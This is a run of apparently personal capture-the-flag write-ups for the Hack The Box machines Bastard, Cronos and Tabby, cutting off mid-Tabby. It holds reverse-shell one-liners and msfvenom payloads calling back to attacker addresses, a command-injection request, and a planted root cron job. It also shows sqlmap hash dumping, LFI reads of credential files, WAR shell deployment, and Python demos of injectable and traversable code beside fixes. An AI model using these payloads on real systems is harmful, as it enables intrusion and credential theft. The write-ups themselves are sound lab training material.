19/03/2017 02:20 \u0026lt;DIR\u0026gt; Administrator 19/03/2017 02:54 \u0026lt;DIR\u0026gt; Classic .NET AppPool 19/03/2017 08:35 \u0026lt;DIR\u0026gt; dimitris 14/07/2009 07:57 \u0026lt;DIR\u0026gt; Public 0 File(s) 0 bytes 6 Dir(s) 4.134.649.856 bytes free drupalgeddon2\u0026gt;\u0026gt; type C:\\Users\\dimitris\\Desktop\\user.txt 292f.....ec9d Stable Shell On https://www.revshells.com/ I quickly generated a reverse-shell one-liner. I used:\nPowerShell #3 (Base64) which gave the command below. Convenient, because the Base64 blob contains no special characters to escape (powershell -e takes the command UTF-16LE-encoded and then Base64-encoded, which is why it is so long).\npowershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMgA1ACIALAAxADMAMwA3ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA== ----------------------- exegol-pentest Bastard $ nc -lnvp 1337 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::1337 Ncat: Listening on 0.0.0.0:1337 Ncat: Connection from 10.10.10.9. Ncat: Connection from 10.10.10.9:57491. PS C:\\inetpub\\drupal-7.54\u0026gt; whoami nt authority\\iusr Better Stable Shell I found a way to get an even more stable shell. The privilege escalation did not even work from the other shell, and it did not show errors either. It is better to generate a shell.exe with msfvenom:\nmsfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.25 LPORT=9999 -a x64 --platform windows -e x64/xor_dynamic -b \u0026#39;\\x00\u0026#39; -f exe -o shell.exe -------------- PS C:\\inetpub\\drupal-7.54\u0026gt; .\\shell.exe -------------- $ nc -lnvp 9999 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::9999 Ncat: Listening on 0.0.0.0:9999 Ncat: Connection from 10.10.10.9. Ncat: Connection from 10.10.10.9:57676. Windows PowerShell running as user BASTARD$ on BASTARD Copyright (C) Microsoft Corporation. All rights reserved. PS C:\\inetpub\\drupal-7.54\u0026gt; Privilege Escalation SeImpersonatePrivilege - JuicyPotato We exploit SeImpersonatePrivilege with JuicyPotato (I really struggled with this one). Generate a second reverse-shell .exe on another port:\nmsfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.25 LPORT=8888 -a x64 --platform windows -e x64/xor_dynamic -b \u0026#39;\\x00\u0026#39; -f exe -o shell2.exe Copy shell2.exe to the target, then run JuicyPotato.exe:\nPS C:\\inetpub\\drupal-7.54\u0026gt; ./JP.exe -p cmd.exe -a \u0026#39;/c C:\\inetpub\\drupal-7.54\\shell2.exe\u0026#39; -l 4444 -t * -c \u0026#39;{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}\u0026#39; Testing {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} 4444 .... 
[+] authresult 0 {9B1F122C-2982-4e91-AA8B-E071D54F2A4D};NT AUTHORITY\\SYSTEM [+] CreateProcessWithTokenW OK ------------------------------- exegol-pentest /workspace $ nc -lnvp 8888 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::8888 Ncat: Listening on 0.0.0.0:8888 Ncat: Connection from 10.10.10.9. Ncat: Connection from 10.10.10.9:57681. Windows PowerShell running as user BASTARD$ on BASTARD Copyright (C) Microsoft Corporation. All rights reserved. PS C:\\Windows\\system32\u0026gt; type C:\\Users\\Administrator\\Desktop\\root.txt 47f4.....3c54 Tips A reverse shell generated with msfvenom seems more stable (and shows errors) than the powershell -e ... one-liner I used. Maybe reach for it first next time? Watch out for the CLSID. Always test several. NEVER TRUST THE DEFAULT ONE. The published lists are organised by Windows version and edition, and a CLSID that yields SYSTEM on one build may not exist, or may run as a lower-privileged account, on another; pick candidates for the target's build from: https://ohpe.it/juicy-potato/CLSID/ https://github.com/ohpe/juicy-potato/tree/master/CLSID/ ","date":"2025-07-11T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/bastard-htb/","title":"HTB | Bastard"},{"content":" Machine name OS IP Difficulty Cronos Linux 10.10.10.13 Medium Enumeration nmap $ nmap -sC -sV -p- -An -vvv 10.10.10.13 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 18b973826f26c7788f1b3988d802cee8 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkOUbDfxsLPWvII72vC7hU4sfLkKVEqyHRpvPWV2+5s2S4kH0rS25C/R+pyGIKHF9LGWTqTChmTbcRJLZE4cJCCOEoIyoeXUZWMYJCqV8crflHiVG7Zx3wdUJ4yb54G6NlS4CQFwChHEH9xHlqsJhkpkYEnmKc+CvMzCbn6CZn9KayOuHPy5NEqTRIHObjIEhbrz2ho8+bKP43fJpWFEx0bAzFFGzU0fMEt8Mj5j71JEpSws4GEgMycq4lQMuw8g6Acf4AqvGC5zqpf2VRID0BDi3gdD1vvX2d67QzHJTPA5wgCk/KzoIAovEwGqjIvWnTzXLL8TilZI6/PV8wPHzn | 256 1ae606a6050bbb4192b028bf7fe5963b (ECDSA) | ecdsa-sha2-nistp256 
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKWsTNMJT9n5sJr5U1iP8dcbkBrDMs4yp7RRAvuu10E6FmORRY/qrokZVNagS1SA9mC6eaxkgW6NBgBEggm3kfQ= | 256 1a0ee7ba00cc020104cda3a93f5e2220 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHBIQsAL/XR/HGmUzGZgRJe/1lQvrFWnODXvxQ1Dc+Zx 53/tcp open domain syn-ack ttl 63 ISC BIND 9.10.3-P4 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.10.3-P4-Ubuntu 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: POST OPTIONS GET HEAD |_http-title: Apache2 Ubuntu Default Page: It works |_http-server-header: Apache/2.4.18 (Ubuntu) Foothold dig BIND on port 53 allows a zone transfer for cronos.htb, which reveals the admin.cronos.htb vhost: ## dig axfr @10.10.10.13 cronos.htb ; \u0026lt;\u0026lt;\u0026gt;\u0026gt; DiG 9.18.33-1~deb12u2-Debian \u0026lt;\u0026lt;\u0026gt;\u0026gt; axfr @10.10.10.13 cronos.htb ; (1 server found) ;; global options: +cmd cronos.htb.\t604800\tIN\tSOA\tcronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800 cronos.htb.\t604800\tIN\tNS\tns1.cronos.htb. cronos.htb.\t604800\tIN\tA\t10.10.10.13 admin.cronos.htb.\t604800\tIN\tA\t10.10.10.13 ns1.cronos.htb.\t604800\tIN\tA\t10.10.10.13 www.cronos.htb.\t604800\tIN\tA\t10.10.10.13 cronos.htb.\t604800\tIN\tSOA\tcronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800 ;; Query time: 20 msec ;; SERVER: 10.10.10.13#53(10.10.10.13) (TCP) ;; WHEN: Thu Jul 10 22:16:46 CEST 2025 ;; XFR size: 7 records (messages 1, bytes 203) admin.cronos.htb login page: sqlmap sqlmap --forms --batch -u \u0026#34;http://admin.cronos.htb/\u0026#34; \u0026gt; username field is vulnerable to blind SQL Injection ! sqlmap --forms --batch -u \u0026#34;http://admin.cronos.htb/\u0026#34; --current-db \u0026gt; admin sqlmap --forms --batch -u \u0026#34;http://admin.cronos.htb/\u0026#34; -D admin --tables \u0026gt; users sqlmap --forms --batch -u \u0026#34;http://admin.cronos.htb/\u0026#34; -D admin -T users --columns \u0026gt; Too slow... 
Trying to guess the \u0026#34;password\u0026#34; column name instead of enumerating columns, and it works! sqlmap --forms --batch -u \u0026#34;http://admin.cronos.htb/\u0026#34; -D admin -T users -C password --dump \u0026gt; 4f5fffa7b2340178a716e3832451e058 On CrackStation: not found. hashcat with rockyou.txt: not found.\nI searched for the hash on Google: \u0026ldquo;4f5fffa7b2340178a716e3832451e058\u0026rdquo; Bingo! The password is 1327663704\nTrying these credentials on the admin.cronos.htb login page works:\nuser: admin pass: 1327663704 Reviewing the source code later shows why the hash was a plain, unsalted MD5 that a search engine could resolve: $myusername = $_POST[\u0026lsquo;username\u0026rsquo;]; $mypassword = md5($_POST[\u0026lsquo;password\u0026rsquo;]);\nCommand Injection - admin dashboard The admin page lets us run ping and traceroute. With Burp we can modify the command to execute whatever we want, so we run a reverse shell back to our machine (the Base64 below decodes to sh -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.25/9001 0\u0026gt;\u0026amp;1, which is then decoded and piped into bash on the target):\nPOST /welcome.php HTTP/1.1 Host: admin.cronos.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 16 Origin: http://admin.cronos.htb Connection: keep-alive Referer: http://admin.cronos.htb/welcome.php Cookie: PHPSESSID=0p5lct2jjmbq5neupststnl996 Upgrade-Insecure-Requests: 1 Priority: u=0, i command=echo+c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjUvOTAwMSAwPiYx+|+base64+-d+|+bash\u0026amp;host=z ------------------------ $ nc -lnvp 9001 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::9001 Ncat: Listening on 0.0.0.0:9001 Ncat: Connection from 10.10.10.13. Ncat: Connection from 10.10.10.13:55658. 
sh: 0: can\u0026#39;t access tty; job control turned off $ whoami www-data $ export TERM=xterm $ python3 -V Python 3.5.2 $ python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; www-data@cronos:/var/www/admin$ ^Z [2] + 27640 suspended nc -lnvp 9001 [Jul 10, 2025 - 23:33:12 (CEST)] exegol-pentest Cronos # stty raw -echo;fg [2] - 27640 continued nc -lnvp 9001 www-data@cronos:/var/www/admin$ whoami www-data www-data@cronos:/var/www/admin$ cd /home www-data@cronos:/home$ cd noulis/ www-data@cronos:/home/noulis$ cat user.txt fe30.....e498 www-data -\u0026gt; root laravel root crontab Using linpeas, we notice that root runs the following every minute:\nphp /var/www/laravel/artisan schedule:run \u0026gt;\u0026gt; /dev/null 2\u0026gt;\u0026amp;1\n╔══════════╣ Check for vulnerable cron jobs ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs ══╣ Cron jobs list ... SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin 17 *\t* * *\troot cd / \u0026amp;\u0026amp; run-parts --report /etc/cron.hourly 25 6\t* * *\troot\ttest -x /usr/sbin/anacron || ( cd / \u0026amp;\u0026amp; run-parts --report /etc/cron.daily ) 47 6\t* * 7\troot\ttest -x /usr/sbin/anacron || ( cd / \u0026amp;\u0026amp; run-parts --report /etc/cron.weekly ) 52 6\t1 * *\troot\ttest -x /usr/sbin/anacron || ( cd / \u0026amp;\u0026amp; run-parts --report /etc/cron.monthly ) * * * * *\troot\tphp /var/www/laravel/artisan schedule:run \u0026gt;\u0026gt; /dev/null 2\u0026gt;\u0026amp;1 With ChatGPT\u0026rsquo;s help we work out that the file to modify is /var/www/laravel/app/Console/Kernel.php: its schedule() method is what artisan schedule:run evaluates, so whatever it registers runs as root every minute, and the file is writable by www-data. 
So all we have to do is register a reverse-shell command there and wait.\nwww-data@cronos:/var/www/laravel/app/Console$ head Kernel.php -n100 \u0026lt;?php namespace App\\Console; use Illuminate\\Console\\Scheduling\\Schedule; use Illuminate\\Foundation\\Console\\Kernel as ConsoleKernel; class Kernel extends ConsoleKernel { /** * The Artisan commands provided by your application. * * @var array */ protected $commands = [ // ]; /** * Define the application\u0026#39;s command schedule. * * @param \\Illuminate\\Console\\Scheduling\\Schedule $schedule * @return void */ protected function schedule(Schedule $schedule) { $schedule-\u0026gt;exec(\u0026#39;echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjUvOTAwMiAwPiYx | base64 -d | bash\u0026#39;)-\u0026gt;everyMinute(); // $schedule-\u0026gt;command(\u0026#39;inspire\u0026#39;) // -\u0026gt;hourly(); } /** * Register the Closure based commands for the application. * * @return void */ protected function commands() { require base_path(\u0026#39;routes/console.php\u0026#39;); } } After a minute we receive a shell as root (the Base64 is the same sh -i reverse shell as before, pointed at port 9002).\n## nc -lnvp 9002 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::9002 Ncat: Listening on 0.0.0.0:9002 Ncat: Connection from 10.10.10.13. Ncat: Connection from 10.10.10.13:38926. sh: 0: can\u0026#39;t access tty; job control turned off # whoami root # cat /root/root.txt\t3c1c.....64e8 Tips Always run sqlmap on a login page if nothing else turns up! Trying a \u0026#39; or 1=1; -- by hand is not enough. 
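As an added example that is not from the Cronos writeup or from the box's own source: the two weaknesses found above, a login query assembled from user input and passwords stored as unsalted MD5, rebuilt in Python against an in-memory SQLite database, beside a hardened version that binds parameters and stores a salted PBKDF2 hash. The table layout, the query shape, the function names and the PBKDF2 work factor are assumptions; the hash and the password are the ones recovered on the page, and the injected username is the hand test from the Tips.

```python
import hashlib
import hmac
import os
import sqlite3

# Values from the writeup: the hash sqlmap dumped for admin and the password found for it.
CRONOS_ADMIN_HASH = "4f5fffa7b2340178a716e3832451e058"
CRONOS_ADMIN_PASSWORD = "1327663704"
PBKDF2_ROUNDS = 200_000  # assumption: a reasonable work factor, not a value from the page
SQLI_PAYLOAD = "' OR 1=1-- "  # the classic hand test mentioned in the Tips


def md5_hex(password: str) -> str:
    """What the page's md5($_POST['password']) does: unsalted and fast, so the digest
    is the same everywhere and a search engine can resolve it."""
    return hashlib.md5(password.encode()).hexdigest()


def _new_users_table() -> sqlite3.Connection:
    """Constructed stand-in for the 'admin' database and its 'users' table seen via sqlmap."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT NOT NULL)")
    return db


def make_legacy_db() -> sqlite3.Connection:
    db = _new_users_table()
    db.execute("INSERT INTO users VALUES (?, ?)", ("admin", md5_hex(CRONOS_ADMIN_PASSWORD)))
    return db


def login_vulnerable(db: sqlite3.Connection, username: str, password: str) -> bool:
    """Assumed shape of the original login: input pasted into the SQL text, so a quote in
    the username rewrites the WHERE clause. Any row back counts as 'logged in'."""
    query = (
        "SELECT username FROM users WHERE username = '%s' AND password = '%s'"
        % (username, md5_hex(password))
    )
    return db.execute(query).fetchone() is not None


def hash_password(password: str, salt: bytes = b"") -> str:
    """Salted PBKDF2-HMAC-SHA256, stored as hex(salt)$hex(digest)."""
    if not salt:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt.hex() + "$" + digest.hex()


def verify_password(stored: str, password: str) -> bool:
    salt_hex, digest_hex = stored.split("$", 1)
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), PBKDF2_ROUNDS
    )
    return hmac.compare_digest(candidate.hex(), digest_hex)


def make_hardened_db() -> sqlite3.Connection:
    db = _new_users_table()
    db.execute("INSERT INTO users VALUES (?, ?)", ("admin", hash_password(CRONOS_ADMIN_PASSWORD)))
    return db


def login_safe(db: sqlite3.Connection, username: str, password: str) -> bool:
    """Bound parameter: the username is data, never SQL. The row's salted hash is then
    checked with a constant-time comparison."""
    row = db.execute("SELECT password FROM users WHERE username = ?", (username,)).fetchone()
    if row is None:
        return False
    return verify_password(row[0], password)


if __name__ == "__main__":
    legacy, hardened = make_legacy_db(), make_hardened_db()
    print("md5 of the found password matches the dumped hash:",
          md5_hex(CRONOS_ADMIN_PASSWORD) == CRONOS_ADMIN_HASH)
    print("vulnerable login with injected username:", login_vulnerable(legacy, SQLI_PAYLOAD, "x"))
    print("hardened login with injected username:  ", login_safe(hardened, SQLI_PAYLOAD, "x"))
    print("hardened login with the real credentials:", login_safe(hardened, "admin", CRONOS_ADMIN_PASSWORD))
```

The injected username turns the vulnerable query into `... WHERE username = '' OR 1=1-- ' AND ...`, the comment swallows the password check, and the first row logs you in. The same string is inert against the bound query. On Cronos the page notes that the hand test did not get in and sqlmap's blind techniques were needed, which is the point of the Tips above.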
There are many SQL injections that you only discover with sqlmap... ","date":"2025-07-11T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/cronos-htb/","title":"HTB | Cronos"},{"content":" Machine name OS IP Difficulty Tabby Linux 10.10.10.194 Easy System Info Ubuntu Users tomcat : $3cureP4s5w0rd123! ash : admin@it Enumeration nmap $ nmap -sC -sV -p- -An -T4 10.10.10.194 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA) | 256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA) |_ 256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Mega Hosting |_http-server-header: Apache/2.4.41 (Ubuntu) 8080/tcp open http Apache Tomcat |_http-title: Apache Tomcat Foothold LFI on the port 80 site (megahosting.htb) The news.php page takes a file parameter and includes whatever path it names, so a traversal reads arbitrary files: http://megahosting.htb/news.php?file=../../../../../../../../etc/passwd \u0026lt;\u0026lt;------------\u0026gt;\u0026gt; root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false sshd:x:111:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false tomcat:x:997:997::/opt/tomcat:/bin/false mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false ash:x:1000:1000:clive:/home/ash:/bin/bash Tomcat Credentials using LFI Using the LFI on the port 80 website, we can retrieve the credentials for the Tomcat server on port 8080 by reading tomcat-users.xml from the tomcat9 package location on this box, /usr/share/tomcat9/etc/:\nGET /news.php?file=../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml HTTP/1.1 ------------------------- ... \u0026lt;user username=\u0026#34;role1\u0026#34; password=\u0026#34;\u0026lt;must-be-changed\u0026gt;\u0026#34; roles=\u0026#34;role1\u0026#34;/\u0026gt; --\u0026gt; \u0026lt;role rolename=\u0026#34;admin-gui\u0026#34;/\u0026gt; \u0026lt;role rolename=\u0026#34;manager-script\u0026#34;/\u0026gt; \u0026lt;user username=\u0026#34;tomcat\u0026#34; password=\u0026#34;$3cureP4s5w0rd123!\u0026#34; roles=\u0026#34;admin-gui,manager-script\u0026#34;/\u0026gt; \u0026lt;/tomcat-users\u0026gt; Upload War file The manager-script role lets us use the Tomcat text API to deploy a WAR containing a shell. 
Normally one would do this through the Manager web GUI, but that needs the manager-gui role, which this account lacks! With manager-script alone it is still possible, but only through the text API (/manager/text/...), which is what the curl below does; requesting the deployed context (http://megahosting.htb:8080/shell/) then runs the JSP and connects back:\n~/github/Hacking/HackTheBox/Machines/Linux/Easy/Tabby (main*) » msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.10 LPORT=1337 -f war -o shell.war Payload size: 13027 bytes Final size of war file: 13027 bytes Saved as: shell.war ~/github/Hacking/HackTheBox/Machines/Linux/Easy/Tabby (main*) » curl -X PUT -u \u0026#39;tomcat:$3cureP4s5w0rd123!\u0026#39; --upload-file shell.war \u0026#39;http://megahosting.htb:8080/manager/text/deploy?path=/shell\u0026amp;update=true\u0026#39; OK - Deployed application at context path [/shell] --------------------------- ~ » nc -lnvp 1337 listening on [any] 1337 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.10.194] 46720 whoami tomcat Ash backup file - user flag » cat linpeas.out | grep ash | tail ... -rw-r--r-- 1 ash ash 8716 Jun 16 2020 /var/www/html/files/16162020_backup.zip \u0026lt;--------- HERE ... -rw-r--r-- 1 root root 220 Feb 25 2020 /snap/core20/1081/etc/skel/.bash_logout -rw-r--r-- 1 root root 220 Feb 25 2020 /etc/skel/.bash_logout -rw-r--r-- 1 tomcat tomcat 220 Feb 25 2020 /opt/tomcat/.bash_logout # On Kali $ zip2john 16162020_backup.zip \u0026gt; hash.txt $ john --format=PKZIP hash.txt --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Will run 12 OpenMP threads Press \u0026#39;q\u0026#39; or Ctrl-C to abort, almost any other key for status admin@it (16162020_backup.zip) 1g 0:00:00:01 DONE (2025-05-05 19:03) 0.9615g/s 9972Kp/s 9972Kc/s 9972KC/s adzlogan..adamsapple:)1 Use the \u0026#34;--show\u0026#34; option to display all of the cracked passwords reliably Session completed. 
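Before moving on to ash, here is the file-read primitive that opened this box, as an added example that is not the code of Tabby's news.php: a handler that opens whatever path its file parameter names, rebuilt in Python beside a hardened version, both run against a throw-away directory tree built inside the block. The directory layout, the file contents and the function names are constructed for the demonstration.

```python
import os
import tempfile


def read_file_vulnerable(files_dir: str, name: str) -> str:
    """Assumed shape of the bug: the user-supplied name joined straight onto the
    directory. '../' walks out of it, and an absolute name discards files_dir entirely."""
    with open(os.path.join(files_dir, name), encoding="utf-8") as fh:
        return fh.read()


def read_file_safe(files_dir: str, name: str) -> str:
    """Resolve symlinks and '..' first, then refuse anything that left files_dir."""
    root = os.path.realpath(files_dir)
    target = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, target]) != root:
        raise PermissionError("refusing a path outside %s: %r" % (root, name))
    with open(target, encoding="utf-8") as fh:
        return fh.read()


def safe_read_blocked(files_dir: str, name: str) -> bool:
    """True when the hardened reader rejects the name."""
    try:
        read_file_safe(files_dir, name)
    except PermissionError:
        return True
    return False


def make_demo_tree() -> str:
    """Constructed tree: <tmp>/www/files/statement.txt is the intended content and
    <tmp>/etc/tomcat-users.xml stands in for the credentials file outside the web root."""
    tmp = tempfile.mkdtemp(prefix="lfi-demo-")
    files_dir = os.path.join(tmp, "www", "files")
    os.makedirs(files_dir)
    os.makedirs(os.path.join(tmp, "etc"))
    with open(os.path.join(files_dir, "statement.txt"), "w", encoding="utf-8") as fh:
        fh.write("Mega Hosting statement\n")
    with open(os.path.join(tmp, "etc", "tomcat-users.xml"), "w", encoding="utf-8") as fh:
        fh.write('<user username="tomcat" password="constructed-secret" roles="manager-script"/>\n')
    return tmp


def demo() -> dict:
    """Runs both readers against the constructed tree and reports what each returned."""
    tmp = make_demo_tree()
    files_dir = os.path.join(tmp, "www", "files")
    traversal = "../../etc/tomcat-users.xml"  # from www/files up to <tmp>, then into etc/
    return {
        "intended": read_file_safe(files_dir, "statement.txt"),
        "leaked": read_file_vulnerable(files_dir, traversal),
        "traversal_blocked": safe_read_blocked(files_dir, traversal),
        "absolute_blocked": safe_read_blocked(files_dir, "/etc/hostname"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print("%s: %r" % (key, value))
```

Note that the check compares resolved paths, not the raw string: a blacklist for `../` would still let through an absolute path or a symlink inside the directory pointing outside it, which is exactly the kind of thing `realpath` normalises before the comparison.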
We can use this password to move laterally to the ash user:\ntomcat@tabby:/home$ tomcat@tabby:/home$ su ash Password: admin@it ash@tabby:/home$ whoami ash ash@tabby:/home$ cd ash/ ash@tabby:~$ cat user.txt fb78.....79f6 Ash - SSH connection Generate a key pair on the box, add the public key to authorized_keys and copy the private key to the attacking machine as ash.key:\nash@tabby:~/.ssh$ ssh-keygen ... ash@tabby:~/.ssh$ ls authorized_keys id_rsa id_rsa.pub ---------------------- » ssh ash@10.10.10.194 -i ash.key # \u0026lt;-- with the private key Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-31-generic x86_64) ..... Last login: Tue May 19 11:48:00 2020 ash@tabby:~$ Privilege Escalation Enumeration We notice that ash is a member of the lxd group and that lxd is running on the machine. ChatGPT pointed me to the possibility of an lxd exploit.\n════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════ ╚════════════════════════════════════════════════╝ ╔══════════╣ Running processes (cleaned) ╚ Check weird \u0026amp; unexpected proceses run by root: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes root 81608 0.0 0.0 2488 588 ? S 17:18 0:00 _ bpfilter_umh root 1 0.0 0.5 104124 11460 ? Ss 11:11 0:01 /sbin/init maybe-ubiquity root 510 0.0 1.8 92596 37716 ? S\u0026lt;s 11:11 0:03 /lib/systemd/systemd-journald root 537 0.0 0.2 21748 5884 ? Ss 11:11 0:00 /lib/systemd/systemd-udevd root 677 0.0 0.9 411432 18380 ? SLsl 11:11 0:05 /sbin/multipathd -d -s systemd+ 711 0.0 0.6 24312 13280 ? Ss 11:11 0:01 /lib/systemd/systemd-resolved systemd+ 712 0.0 0.3 90388 6392 ? Ssl 11:11 0:01 /lib/systemd/systemd-timesyncd └─(Caps) 0x0000000002000000=cap_sys_time root 722 0.0 0.5 47524 10376 ? 
